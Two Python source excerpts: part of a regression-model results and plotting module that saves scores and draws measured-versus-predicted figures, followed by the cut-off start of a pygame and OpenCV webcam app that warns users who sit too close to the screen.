pd.Index(range(1,n_feats_linspace+1), name='feat_n') df_score = df_score.set_index('feat_n').reindex(new_index).reset_index() # df_score_list[idx_model] = df_score df_score_list = df_score_list[:idx_model] + (df_score,) + df_score_list[idx_model+1:] return df_pred_list, df_score_list def set_up_output_dir(dir_results, msi_run_id, grid_idx, y_label, feat_name, test_or_tune='tuning'): ''' Ensures all folder directories are created, then returns each directory level for easy access for reading and writing of files for a given ``msi_run_id``, ``grid_idx``, ``y_label``, and ``feat_name``. test_or_tune (``str``): Should be either 'tuning' or 'testing' ''' folder_msi = 'msi_' + str(msi_run_id) + '_' + str(grid_idx).zfill(3) dir_out0 = os.path.join(dir_results, folder_msi) # folder 1 # if not os.path.isdir(dir_out0): # pathlib.Path(dir_out0).mkdir(parents=True, exist_ok=True) dir_out1 = os.path.join(dir_out0, y_label) # folder 2 # if not os.path.isdir(dir_out1): # pathlib.Path(dir_out1).mkdir(parents=True, exist_ok=True) dir_out2 = os.path.join(dir_out1, feat_name) # folder 3 # if not os.path.isdir(dir_out2): # pathlib.Path(dir_out2).mkdir(parents=True, exist_ok=True) dir_out3 = os.path.join(dir_results, folder_msi, y_label, feat_name, test_or_tune) # folder 4 # if not os.path.isdir(dir_out3): pathlib.Path(dir_out3).mkdir(parents=True, exist_ok=True) if test_or_tune == 'testing': # if not os.path.isdir(os.path.join(dir_out3, 'figures')): pathlib.Path(os.path.join(dir_out3, 'figures')).mkdir(parents=True, exist_ok=True) return [dir_out0, dir_out1, dir_out2, dir_out3], [folder_msi, y_label, feat_name, test_or_tune] def set_up_summary_files(dir_out, y_label, n_feats, msi_run_id): ''' meta_info = [msi_run_id, grid_idx, y_label, extra_feats] ''' cols = ['msi_run_id', 'grid_idx', 'response_label', 'extra_feats', 'model_name'] feat_list = list(range(1,50+1)) cols.extend(feat_list) msi_str = 'msi_' + str(msi_run_id) + '_' fname_sum_mae = os.path.join(dir_out, msi_str + '_'.join((y_label, 'MAE')) + '.csv') fname_sum_rmse = os.path.join(dir_out, msi_str + '_'.join((y_label, 'RMSE')) + '.csv') fname_sum_r2 = os.path.join(dir_out, msi_str + '_'.join((y_label, 'R2')) + '.csv') if not os.path.isfile(fname_sum_mae): df_sum_mae = pd.DataFrame(columns=cols) df_sum_mae.to_csv(fname_sum_mae, index=False) if not os.path.isfile(fname_sum_rmse): df_sum_rmse = pd.DataFrame(columns=cols) df_sum_rmse.to_csv(fname_sum_rmse, index=False) if not os.path.isfile(fname_sum_r2): df_sum_r2 = pd.DataFrame(columns=cols) df_sum_r2.to_csv(fname_sum_r2, index=False) def append_test_scores(dir_out, y_label, df_score_list, model_list, metadata): ''' metadata = [msi_run_id, row.name, y_label, extra_feats] ''' cols = ['msi_run_id', 'grid_idx', 'response_label', 'extra_feats', 'model_name'] msi_str = 'msi_' + str(metadata[0]) + '_' fname_sum_mae = os.path.join(dir_out, msi_str + '_'.join((y_label, 'MAE')) + '.csv') fname_sum_rmse = os.path.join(dir_out, msi_str + '_'.join((y_label, 'RMSE')) + '.csv') fname_sum_r2 = os.path.join(dir_out, msi_str + '_'.join((y_label, 'R2')) + '.csv') for idx_model, model in enumerate(model_list): meta = metadata + [str(model).split('(')[0]] # metadata.append(str(model).split('(')[0]) s_metadata = pd.Series(meta, index=cols) df_score = df_score_list[idx_model] df_score.set_index('feat_n') s_score_mae = s_metadata.append(df_score['score_test_mae'].transpose()) s_score_rmse = s_metadata.append(df_score['score_test_rmse'].transpose()) s_score_r2 = s_metadata.append(df_score['score_test_r2'].transpose()) df_score_mae = pd.DataFrame(s_score_mae).T df_score_rmse = pd.DataFrame(s_score_rmse).T df_score_r2 = pd.DataFrame(s_score_r2).T df_score_mae.to_csv(fname_sum_mae, header=None, mode='a', index=False, index_label=df_score_mae.columns) df_score_rmse.to_csv(fname_sum_rmse, header=None, mode='a', index=False, index_label=df_score_rmse.columns) df_score_r2.to_csv(fname_sum_r2, header=None, mode='a', index=False, index_label=df_score_r2.columns) def save_test_results(dir_out_test, df_pred_list, df_score_list, model_list, fname_base='msi_00_000_measurement_units'): ''' Parameters: fname_base (``str``): the beginning of the final file names to be saved. Other information will be appended to this string to desribe predictions/scoring, as well as the model being used. ''' pred_str = '_test-preds-' score_str = '_test-scores-' for idx, model in enumerate(model_list): df_pred = df_pred_list[idx] df_score = df_score_list[idx] if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_pred = os.path.join( dir_out_test, fname_base + pred_str + model_str + '.csv') fname_score = os.path.join( dir_out_test, fname_base + score_str + model_str + '.csv') df_pred.to_csv(fname_pred, index=False) df_score.to_csv(fname_score, index=False) def load_test_results(dir_out_test, model_list, fname_base='msi_00_000_measurement_units'): ''' Loads all testing results from ``dir_out_test`` ''' pred_str = '_test-preds-' score_str = '_test-scores-' df_pred_list = () df_score_list = () for idx, model in enumerate(model_list): if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_pred = os.path.join( dir_out_test, fname_base + pred_str + model_str + '.csv') fname_score = os.path.join( dir_out_test, fname_base + score_str + model_str + '.csv') # df_pred_list.append(pd.read_csv(fname_pred)) # df_score_list.append(pd.read_csv(fname_score)) df_pred_list += (pd.read_csv(fname_pred),) df_score_list += (pd.read_csv(fname_score),) return df_pred_list, df_score_list # In[Plotting functions] def calc_r2(s_x, s_y, print_out=False): s_x = s_x.values s_y = s_y.values reg1 = LinearRegression().fit(s_x.reshape(-1,1), s_y.reshape(-1,1)) r_2 = reg1.score(s_x.reshape(-1,1), s_y.reshape(-1,1)) y_pred = reg1.predict(s_x[:, np.newaxis]) rmse = np.sqrt(mean_squared_error(s_y, y_pred)) x_lin = np.linspace(s_x.min()-s_x.min()*0.1, s_x.max()+s_x.max()*0.1, num=20) y_lin = reg1.predict(x_lin[:, np.newaxis]) if print_out is True: print(r'R^2 = {0:.3f}'.format(r_2)) print(r'RMSE = {0:.1f}'.format(rmse)) return r_2, rmse, x_lin, y_lin def _annotate_arrow(ax, str_r2, x_arrow, y_arrow, xytext=(0.05, 0.83), ha='left', va='top', fontsize=16, color='#464646'): boxstyle_str = 'round, pad=0.5, rounding_size=0.15' ax.annotate( str_r2, xy=(x_arrow, y_arrow), xytext=xytext, # loc to place text textcoords='axes fraction', # placed relative to axes ha=ha, va=va, fontsize=fontsize, color=color, bbox=dict(boxstyle=boxstyle_str, pad=0.5, fc=(1, 1, 1), ec=(0.5, 0.5, 0.5), alpha=0.7), arrowprops=dict(arrowstyle='-|>', color=color, # patchB=el, shrinkA=0, shrinkB=0, connectionstyle='arc3,rad=-0.2', alpha=0.4)) def best_fit_line(df, x_col, y_col, ax, fontsize=16, linecolor='#464646', fontcolor='#464646', xytext=(0.95, 0.05), ha='right', va='bottom'): # df = df_preds_las.copy() r_2, rmse, x_lin, y_lin = calc_r2(df[x_col], df[y_col]) lin_r2_las = ax.plot(x_lin, y_lin, color=linecolor, alpha=0.6, linestyle='-') str_r2 = r'Best-fit line' + '\n' + 'R$^{2}$' str_r2_las = '{0} = {1:.3f}'.format(str_r2, r_2) _annotate_arrow(ax, str_r2_las, x_lin[15], y_lin[15], xytext=xytext, ha=ha, va=va, fontsize=fontsize, color=fontcolor) def prediction_error_label(df_scores, feat_n, ax, fontsize, fontcolor, xy=(0.05, 0.1), ha='left', va='top', hsanalyze=None, units=None): score_row = df_scores[df_scores['feat_n'] == int(feat_n)] if hsanalyze is not None: try: # works when just finished training the model band_nums = hsanalyze.io.tools.get_band_num(score_row['feats'].values[0]) except TypeError: # works when loading in data from a previous run band_nums = hsanalyze.io.tools.get_band_num(literal_eval(score_row['feats'].values[0])) wl_list = [] for band in band_nums: wl = hsanalyze.io.tools.get_wavelength(band) wl_list.append(wl) print('The following features were used: {0}'.format(wl_list)) if units is None: units = '' mae = score_row['score_test_mae'].values[0] rmse = score_row['score_test_rmse'].values[0] str_err = ('Prediction error\nMAE = {0:.2f}{2}\nRMSE = {1:.2f}{2}' ''.format(mae, rmse, units)) boxstyle_str = 'round, pad=0.5, rounding_size=0.15' ax.annotate( str_err, xy=xy, xycoords='axes fraction', ha=ha, va=va, fontsize=fontsize, color=fontcolor, bbox=dict(boxstyle=boxstyle_str, pad=0.5, fc=(1, 1, 1), ec=(0.5, 0.5, 0.5), alpha=0.7)) def stratified_error(df_pred, y_col, feat_n, ax, levels=[25, 50, 100], fontsize=16, fontcolor='#464646', linecolor='#464646', alpha=0.7): font_scale = 16/fontsize last_level = 0 for idx in range(len(levels) + 1): try: level = levels[idx] except IndexError: pass if idx == 0: df_preds = df_pred[df_pred[y_col] < level] elif idx == len(levels) - 1: df_preds = df_pred[df_pred[y_col] >= last_level] else: df_preds = df_pred[(df_pred[y_col] >= last_level) & (df_pred[y_col] < level)] y_pos = np.mean([level, last_level]) print(len(df_preds)) mae = mean_absolute_error(df_preds[y_col], df_preds[feat_n]) ax.annotate('{0:.1f}'.format(mae), xy=(184.5, y_pos), xytext=(186, y_pos), xycoords='data', annotation_clip=False, fontsize=fontsize*0.65, rotation=270, ha='left', va='center', color=fontcolor, arrowprops=dict( arrowstyle='-[, widthB={0}, lengthB=0.5'.format(1.5*font_scale), # 1.5, 1.5, 3.15, 4.85 lw=0.7, ls=(0, (3, 3)), color=linecolor, alpha=alpha)) last_level = level def get_min_max(df, feat_n, y_col): try: max_pred = df[feat_n].max() except KeyError: feat_n = str(feat_n) max_pred = df[feat_n].max() max_plot = math.ceil(np.nanmax([max_pred, df[y_col].max()])) # max_plot = math.ceil(np.nanmax([5.130879038769381, 6.102534])) min_plot = int(np.nanmin([df[feat_n].min(), df[y_col].min()])) return max_plot, min_plot def plot_meas_pred(feat_n, y_col, df_preds, ax, x_label='Predicted', y_label='Measured', units=None, max_plot=None, min_plot=None, legend='full', fontsize=16, fontcolor='#464646', linecolor='#464646'): ''' Creates a single plot showing measured (y-axis) vs. predicted (x-axis) ``feat_n`` should be the column heading of the predicted values to plot from ``df_preds``. ``feat_n`` is typically an integer for a given number of features, then the column contains the predicted values to plot. ''' if units is None: units = '' else: units = ' ({0})'.format(units) # markers = dict(V6='P', V8='X', V10='d', V14='8') markers = ('o', 'X', 's', 'P', 'D', '^', 'v', 'p', 'h', 'd', '<', '*', 'H', '8', '>') hue_order = sorted(df_preds['study'].unique()) try: df_preds['date'] = df_preds['date'].dt.date # Be sure date does not include time except AttributeError: pass style_order = sorted(df_preds['date'].unique()) if len(style_order) > 15: style = 'month' df_preds['month'] = pd.DatetimeIndex(df_preds['date']).month_name() style_order = sorted(df_preds['month'].unique()) else: style = 'date' colors = sns.color_palette('pastel', len(hue_order)) if max_plot is None: max_plot, _ = get_min_max(df_preds, feat_n, y_col) if min_plot is None: _, min_plot = get_min_max(df_preds, feat_n, y_col) x_lin = np.linspace(min_plot, max_plot, 2) ax = sns.lineplot(x=x_lin, y=x_lin, color=linecolor, ax=ax, zorder=0.8, linewidth=2) ax.lines[0].set_linestyle('--') ax = sns.scatterplot(x=feat_n, y=y_col, data=df_preds, hue='study', style=style, hue_order=hue_order, style_order=style_order, markers=markers[:len(style_order)], ax=ax, legend=legend, palette=colors) ax.set_ylim([min_plot, max_plot]) ax.set_xlim([min_plot, max_plot]) ax.set_xlabel(x_label + units, fontsize=fontsize, color=fontcolor) ax.set_ylabel(y_label + units, fontsize=fontsize, color=fontcolor) ax.tick_params(labelsize=int(fontsize*0.95), colors=fontcolor) return ax, colors def plot_get_n_models(dir_results, folder_name): ''' Gets the number of models whose data are populated ''' (df_preds_las, df_preds_svr, df_preds_rf, df_preds_pls, df_score_las, df_score_svr, df_score_rf, df_score_pls) =\ load_test_results(os.path.join(dir_results, folder_name), name_append=folder_name.replace('_', '-')) preds_list = [df_preds_las, df_preds_svr, df_preds_rf, df_preds_pls] preds_list_nonnull = [] for item in preds_list: if item is not None: preds_list_nonnull.append(item) score_list = [df_score_las, df_score_svr, df_score_rf, df_score_pls] score_list_nonnull = [] for item in score_list: if item is not None: score_list_nonnull.append(item) n_models = len(preds_list_nonnull) return n_models, preds_list_nonnull, score_list_nonnull def plot_titles(ax, title_text, fontsize=16, fontcolor='white', facecolor='#585858'): ''' Add titles to plots ''' t1 = ax.set_title( title_text, fontsize=fontsize*1.1, fontweight='bold', color=fontcolor, bbox=dict(color=facecolor)) t1.get_bbox_patch().set_boxstyle( 'ext', pad=0.25, width=ax.get_window_extent().width) return t1 def on_resize(event, title_list, axes): for t, ax in zip(title_list, axes): t.get_bbox_patch().set_boxstyle( 'ext', pad=0.2, width=ax.get_window_extent().width) def plot_legend(fig, ax, df_preds, feat_n, colors, study_labels=None, date_labels=None, fontsize=16, handle_color='#464646', handle_size=80, label_color='#464646', ncol=4): study_n = len(df_preds['study'].unique()) # date_n = len(df_preds['date'].unique()) h, l = ax.get_legend_handles_labels() h1 = h[1:study_n+2] h2 = h[study_n+2:] l1 = l[1:study_n+2] l2 = l[study_n+2:] obs_study_labels = [] obs_study_list = [] for study in df_preds['study'].unique(): obs_study_labels.append(study) obs_n = len(df_preds[df_preds['study'] == study]) obs_study_list.append(obs_n) if study_labels is None: study_labels = obs_study_labels.copy() l1[-1] = 'No. features: {0}'.format(feat_n) for handle in h2: handle.set_color(handle_color) handle._sizes = [handle_size] h1_new = [] for i in range(len(h1)-1): handle_new = mlines.Line2D([], [], color=colors[i], marker='s', linestyle='None', markersize=10, label=l1[i]) h1_new.append(handle_new) h1_new.append(mlines.Line2D([], [], alpha=0.0, label=l1[-1])) leg = fig.legend(h2 + h1_new, l2 + l1, loc='upper center', bbox_to_anchor=(0.5, 1.0), fontsize=fontsize*0.85, framealpha=0.85, ncol=ncol, handletextpad=0.1, # spacing between handle and label columnspacing=0.5, frameon=True, edgecolor=label_color) for text in leg.get_texts(): text.set_color(label_color) ax.legend().remove() return leg def legend_resize(fig, leg, twinx=False, twinx_right=0.93): ''' Draws canvas so legend and figure size can be determined, then adjusts figure size so it fits well with the figure. ''' fig.canvas.draw() fig.tight_layout() # height_leg = fig.legends[0].get_window_extent().height # we recreated the legend (and made a second legend) # height_fig = fig.get_window_extent().height height_leg = leg.get_window_extent().height # we recreated the legend (and made a second legend) height_fig = fig.get_window_extent().height legend_adjust = (1 - (height_leg / height_fig)) * 0.98 right = twinx_right if twinx is True else 1 fig.tight_layout(rect=[0, 0, right, legend_adjust]) return fig def plot_scores_feats(df, ax, palette, legend, obj='mae', ls_1='-', lw_a=1.5, y_label=None, units=None, fill_std=False, fontsize=16, fontcolor='#464646'): if fill_std is True: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj, 'std_train_' + obj, 'std_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') else: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_train_' + obj].iloc[1] < 0: df_wide[['score_train_' + obj, 'score_test_' + obj]] = df_wide[['score_train_' + obj, 'score_test_' + obj]] * -1 ax = sns.lineplot( data=df_wide[['score_train_' + obj, 'score_test_' + obj]], ax=ax, palette=palette, legend=legend) ax.lines[0].set_linewidth(lw_a) ax.lines[0].set_linestyle(ls_1) ax.lines[1].set_linestyle(ls_1) if y_label is None: y_label = 'Error' if units is None: units = '' else: units = ' ({0})'.format(units) ax.set_ylabel(y_label + units, fontsize=fontsize, color=fontcolor) ax.set_xlabel('Number of features', fontsize=fontsize, color=fontcolor) ax.tick_params(labelsize=fontsize*0.85, colors=fontcolor, labelleft=True) if fill_std is True: x_feats = df_wide.index std_l = df_wide['score_test_' + obj].values - df_wide['std_test_' + obj].values std_u = df_wide['score_test_' + obj].values + df_wide['std_test_' + obj].values ax.fill_between(x_feats, std_l, std_u, facecolor=palette[1], alpha=0.15) return ax def sync_axis_grids(ax, ax2, ax_min=None, ax_max=None, ax2_min=None, ax2_max=None): l = ax.get_ylim() if ax_min is None else (ax_min, ax_max) l2 = ax2.get_ylim() if ax2_min is None else (ax2_min, ax2_max) ax.set_ylim(l) ax2.set_ylim(l2) f = lambda x : l2[0]+(x-l[0])/(l[1]-l[0])*(l2[1]-l2[0]) ticks = f(ax.get_yticks()) ax2.yaxis.set_major_locator(matplotlib.ticker.FixedLocator(ticks)) ax2.yaxis.set_major_formatter(FormatStrFormatter('%.2f')) return ax, ax2 def plot_secondary(df, ax, palette, legend, obj='r2', ls_2='--', lw_b=1, fontsize=16, fontcolor='#464646', fill_std=False): if fill_std is True: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj, 'std_train_' + obj, 'std_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') else: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_train_' + obj].iloc[1] < 0: df_wide[['score_train_' + obj, 'score_test_' + obj]] = df_wide[['score_train_' + obj, 'score_test_' + obj]] * -1 ax2 = ax.twinx() ax2.grid() ax2 = sns.lineplot(data=df_wide[['score_train_' + obj, 'score_test_' + obj]], ax=ax2, palette=palette, legend=legend) ax2.lines[0].set_linewidth(lw_b) ax2.lines[1].set_linewidth(lw_b) ax2.lines[0].set_linestyle(ls_2) ax2.lines[1].set_linestyle(ls_2) ax2.set_ylabel(r'R$^{2}$', fontsize=fontsize, color=fontcolor, rotation=0, labelpad=15) ax2.tick_params(labelsize=fontsize*0.85, colors=fontcolor, labelright=True) ax2.set_yticks(np.linspace(ax2.get_yticks()[0], ax2.get_yticks()[-1], len(ax.get_yticks()))) if fill_std is True: x_feats = df_wide.index std_l = df_wide['score_test_' + obj].values - df_wide['std_test_' + obj].values std_u = df_wide['score_test_' + obj].values + df_wide['std_test_' + obj].values ax2.fill_between(x_feats, std_l, std_u, facecolor=palette[1], alpha=0.15) return ax, ax2 def plot_all_features_single(df, ax, palette, legend, obj1='mae', linewidth=2, linestyle='-'): df_wide = df[['feat_n', 'score_test_' + obj1]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_test_' + obj1].iloc[1] < 0: df_wide[['score_test_' + obj1]] = df_wide[['score_test_' + obj1]] * -1 x_feats = df_wide.index ax = sns.lineplot(data=df_wide[['score_test_' + obj1]], ax=ax, palette=palette, legend=legend) # ax1b = ax1a.twinx() # ax1b = sns.lineplot(data=df_wide[['score_test_' + obj2]], ax=ax1b, palette=[palette[1]], legend=legend) try: ax.lines[-1].set_linewidth(linewidth) # ax.lines[-2].set_linewidth(linewidth) ax.lines[-1].set_linestyle(linestyle) # ax.lines[-2].set_linestyle(linestyle) except: print('Lines do not exist, may be NaN') return ax def min_max_scores_low(df_scores, obj1='mae', obj2='r2'): min_obj1 = np.min([df_scores['score_train_' + obj1].min(), df_scores['score_test_' + obj1].min()]) max_obj1 = np.max([df_scores['score_train_' + obj1].max(), df_scores['score_test_' + obj1].max()]) min_obj2 = np.min([df_scores['score_train_' + obj2].min(), df_scores['score_test_' + obj2].min()]) max_obj2 = np.max([df_scores['score_train_' + obj2].max(), df_scores['score_test_' + obj2].max()]) return min_obj1, max_obj1, min_obj2, max_obj2 def min_max_scores_high(score_list, obj1, obj2, pct=0.05): min_obj1, max_obj1, min_obj2, max_obj2 = [None] * 4 for df_score in score_list: if min_obj1 is None: min_obj1, max_obj1, min_obj2, max_obj2 = min_max_scores_low( df_score, obj1=obj1, obj2=obj2) else: min_obj1b, max_obj1b, min_obj2b, max_obj2b = min_max_scores_low( df_score, obj1=obj1, obj2=obj2) min_obj1 = min_obj1b if min_obj1b < min_obj1 else min_obj1 max_obj1 = max_obj1b if max_obj1b > max_obj1 else max_obj1 min_obj2 = min_obj2b if min_obj2b < min_obj2 else min_obj2 max_obj2 = max_obj2b if max_obj2b > max_obj2 else max_obj2 coef_obj1 = (max_obj1 - min_obj1) * pct coef_obj2 = (max_obj2 - min_obj2) * pct min_obj1 -= coef_obj1 max_obj1 += coef_obj1 min_obj2 -= coef_obj2 max_obj2 += coef_obj2 return min_obj1, max_obj1, min_obj2, max_obj2 def plot_legend_score(fig, ax2, palette, ls_1='-', ls_2='--', lw_a=1.5, lw_b=1, fontsize=16, handle_color='#464646', label_color='#464646'): h, l = ax2.get_legend_handles_labels() h.insert(0, mpatches.Patch(color=palette[0], label='Training')) h.insert(1, mpatches.Patch(color=palette[1], label='Testing')) l = [r'Training', r'Testing', 'Error', r'R$^{2}$'] h[2].set_linestyle(ls_1) h[3].set_linestyle(ls_2) h[2].set_linewidth(lw_a) h[3].set_linewidth(lw_b) h[2].set_color(handle_color) h[3].set_color(handle_color) leg = fig.legend( h, l, loc='upper center', bbox_to_anchor=(0.5, 1.0), fontsize=fontsize*0.75, framealpha=0.85, ncol=4, handletextpad=0.5, # spacing between handle and label columnspacing=1.5, frameon=True, edgecolor=label_color) for text in leg.get_texts(): text.set_color(label_color) ax2.legend().remove() return leg def plot_pred_figure(fname_out, feat_n, df_pred_list, df_score_list, model_list, x_label='Predicted', y_label='Measured', y_col='nup_kgha', units=None, save_plot=True, fontsize=16, fontcolor='#464646', linecolor='#464646', legend_cols=4): ''' Builds an axes for every regression model, then adds them dynamically to the matplotlib figure to be saved feat_n = 9 x_label = r'Predicted Vine N (ppm)' # '(kg ha$^{-1}$)' y_label = r'Measured Vine N (ppm)' y_col = 'value' Parameters: units (``str``): The units to display in the plot's annotated error boxes (e.g., '%' will add the percent symbol after the error value). ''' plt.style.use('seaborn-whitegrid') try: temp = df_pred_list[0][feat_n] temp = None except KeyError: feat_n = str(feat_n) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True) max_plot = None min_plot = None for df_pred in df_pred_list: if max_plot is None: max_plot, min_plot = get_min_max(df_pred, feat_n, y_col) else: max_plot2, min_plot2 = get_min_max(df_pred, feat_n, y_col) max_plot = max_plot2 if max_plot2 > max_plot else max_plot min_plot = min_plot2 if min_plot2 < min_plot else min_plot BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] _ = plot_titles(axes[0], 'Test') for idx, (ax, df_preds, df_scores) in enumerate(zip(axes, df_pred_list, df_score_list)): if df_preds[feat_n].isnull().values.any(): continue legend = 'full' if idx == 0 else False ax, colors = plot_meas_pred( feat_n, y_col, df_preds, ax, x_label=x_label, y_label=y_label, units=units, max_plot=max_plot, min_plot=min_plot, legend=legend) if idx == 0: leg = plot_legend( fig, ax, df_preds, feat_n, colors, handle_color=fontcolor, label_color=fontcolor, ncol=legend_cols) fig = legend_resize(fig, leg) if model_list is None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) best_fit_line( df_preds, feat_n, y_col, ax, fontsize=fontsize*0.75, linecolor=linecolor, fontcolor=fontcolor, xytext=(0.95, 0.05), ha='right', va='bottom') prediction_error_label( df_scores, feat_n, ax, fontsize*0.75, fontcolor, xy=(0.04, 0.94), ha='left', va='top', units=units) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() return None else: return fig def plot_score_figure( fname_out, df_score_list, model_list, y_label=None, units=None, save_plot=True, ls_1='-', ls_2='--', lw_a=1.5, lw_b=1, obj1='mae', obj2='r2', fontsize=16, fontcolor='#464646', linecolor='#464646'): ''' Plot the error for all number of features ''' palette = sns.color_palette("mako_r", 2) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True) min_obj1, max_obj1, min_obj2, max_obj2 = min_max_scores_high( df_score_list, obj1, obj2) BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] axes2 = [] _ = plot_titles(axes[0], ' ') # idx=0 # ax = axes[idx] # df_scores = df_score_list[idx] for idx, (ax, df_scores) in enumerate(zip(axes, df_score_list)): legend = 'full' if idx == 0 else False ax = plot_scores_feats( df_scores, ax, palette, legend=False, obj=obj1, y_label=y_label, units=units) ax, ax2 = plot_secondary( df_scores, ax, palette, legend=legend, obj=obj2) ax, ax2 = sync_axis_grids(ax, ax2, ax_min=min_obj1, ax_max=max_obj1, ax2_min=min_obj2, ax2_max=max_obj2) if idx == 0: ax.set_xlim([0, df_scores['feat_n'].max()]) ax.xaxis.set_major_locator(MaxNLocator(integer=True)) ax2.tick_params(labelright=False) ax2.yaxis.label.set_visible(False) leg = plot_legend_score( fig, ax2, palette, ls_1=ls_1, ls_2=ls_2, lw_a=lw_a, lw_b=lw_b, fontsize=fontsize, handle_color=fontcolor, label_color=fontcolor) fig = legend_resize(fig, leg, twinx=True) elif idx == len(axes)-1: ax.tick_params(labelleft=False) ax.yaxis.label.set_visible(False) if model_list == None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) axes2.append(ax2) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() return None else: return fig def plot_pred_figure_pp(folder_list_test, dir_out_list_test, feat_n, df_pred_list, df_score_list, model_list, x_label='Predicted', y_label='Measured', y_col='nup_kgha', units=None, save_plot=True, fontsize=16, fontcolor='#464646', linecolor='#464646', legend_cols=4): ''' Builds an axes for every regression model, then adds them dynamically to the matplotlib figure to be saved feat_n = 9 x_label = r'Predicted Vine N (ppm)' # '(kg ha$^{-1}$)' y_label = r'Measured Vine N (ppm)' y_col = 'value' Parameters: units (``str``): The units to display in the plot's annotated error boxes (e.g., '%' will add the percent symbol after the error value). ''' preds_name = '_'.join( ('preds', folder_list_test[1], folder_list_test[2], str(feat_n).zfill(3) + '-feats.png')) fname_out = os.path.join( dir_out_list_test[3], 'figures', preds_name) plt.style.use('seaborn-whitegrid') try: temp = df_pred_list[0][feat_n] temp = None except KeyError: feat_n = str(feat_n) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True) max_plot = None min_plot = None for df_pred in df_pred_list: if max_plot is None: max_plot, min_plot = get_min_max(df_pred, feat_n, y_col) else: max_plot2, min_plot2 = get_min_max(df_pred, feat_n, y_col) max_plot = max_plot2 if max_plot2 > max_plot else max_plot min_plot = min_plot2 if min_plot2 < min_plot else min_plot BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] _ = plot_titles(axes[0], 'Test') for idx, (ax, df_preds, df_scores) in enumerate(zip(axes, df_pred_list, df_score_list)): if df_preds[feat_n].isnull().values.any(): continue legend = 'full' if idx == 0 else False ax, colors = plot_meas_pred( feat_n, y_col, df_preds, ax, x_label=x_label, y_label=y_label, units=units, max_plot=max_plot, min_plot=min_plot, legend=legend) if idx == 0: leg = plot_legend( fig, ax, df_preds, feat_n, colors, handle_color=fontcolor, label_color=fontcolor, ncol=legend_cols) fig = legend_resize(fig, leg) if model_list is None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) best_fit_line( df_preds, feat_n, y_col, ax, fontsize=fontsize*0.75, linecolor=linecolor, fontcolor=fontcolor, xytext=(0.95, 0.05), ha='right', va='bottom') prediction_error_label( df_scores, feat_n, ax, fontsize*0.75, fontcolor, xy=(0.04, 0.94), ha='left', va='top', units=units) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() else: return fig
PygameDisplay.py
# -*- coding: utf-8 -*- """ Created on Sat Feb 26 12:14:08 2022 @author: nuria Ideas #todo - Add either a disgusting image, or a cute image, to make u be not nearby screen """ from __future__ import print_function from WebcamVideoStream import WebcamVideoStream from threading import Thread import pygame import os import time import cv2 as cv import argparse import ctypes # An included library with Python install. import time def detectWidth(frame): frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY) frame_gray = cv.equalizeHist(frame_gray) faces = face_cascade.detectMultiScale(frame_gray,1.3,5) width = 0 for (x, y, w, h) in faces: center = (x + w // 2, y + h // 2) frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4) faceROI = frame_gray[y:y + h, x:x + w] # -- In each face, detect eyes eyes = eyes_cascade.detectMultiScale(faceROI) for (x2, y2, w2, h2) in eyes: eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2) radius = int(round((w2 + h2) * 0.25)) frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4) width = w cv.imshow('Capture - Face detection', frame) return width def Mbox(title, text, style): return ctypes.windll.user32.MessageBoxW(0, text, title, style) def pygame_loop(): pygame.init() screen_width = 700 screen_height = 500 screen = pygame.display.set_mode((screen_width, screen_height)) pygame_icon_png = "Eyes.png" #icon of pygame. Must be 32x32 pixels font_30 = pygame.font.SysFont("calibri", 30) font_18 = pygame.font.SysFont("calibri", 30) def write_message(message, color = (0,0,0), rectangle=[0,0], font=font_18, update = True, centered = False): mesg = font.render(message, True, color) if centered: w,h = rectangle rectangle = [w-mesg.get_width()/2,h] screen.blit(mesg, rectangle) if update: pygame.display.update() def RedScreen(): screen.fill((200,0,0)) write_message("you are too close to the screen!", color = (255,255,255), 